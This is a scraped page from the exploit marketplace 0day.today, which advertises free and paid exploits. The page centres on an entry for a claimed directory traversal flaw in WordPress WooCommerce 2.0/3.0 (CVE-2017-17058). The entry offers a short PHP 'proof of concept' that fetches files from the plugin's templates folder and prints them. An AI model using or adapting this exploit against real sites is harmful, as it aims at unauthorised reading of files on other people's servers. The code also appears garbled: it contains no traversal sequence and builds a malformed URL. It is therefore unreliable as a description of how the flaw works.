0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress WooCommerce 2.0 / 3.0 Directory Traversal Vulnerability
# Exploit Title: WordPress woocommerce directory traversal # Date: 28-11-2017 # Software Link: https://wordpress.org/plugins/woocommerce/ # Exploit Author:fu2x2000 # Contact: fu2x2000@gmail.com # CVE:2017-17058 #Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0 # Category: webapps 1. Description Identifying woo commerce theme pluging properly sanitized against Directory Traversal,even the latest version of WordPress with woocommerce can be vulnerable. 2. Proof of Concept $woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; ` function file_get_contents_utf8($fn) { $opts = array( 'http' => array( 'method'=>"GET", 'header'=>"Content-Type: text/html; charset=utf-8" ) ); $wp = stream_context_create($opts); $result = @file_get_contents($fn,false,$wp); return $result; } /* $head= header("Content-Type: text/html; charset=utf-8"); ; */ header("Content-Type: text/html; charset=utf-8"); $result = file_get_contents_utf8("http://".$woo); echo $result; Regards Fu2x200 # 0day.today [2024-07-03] #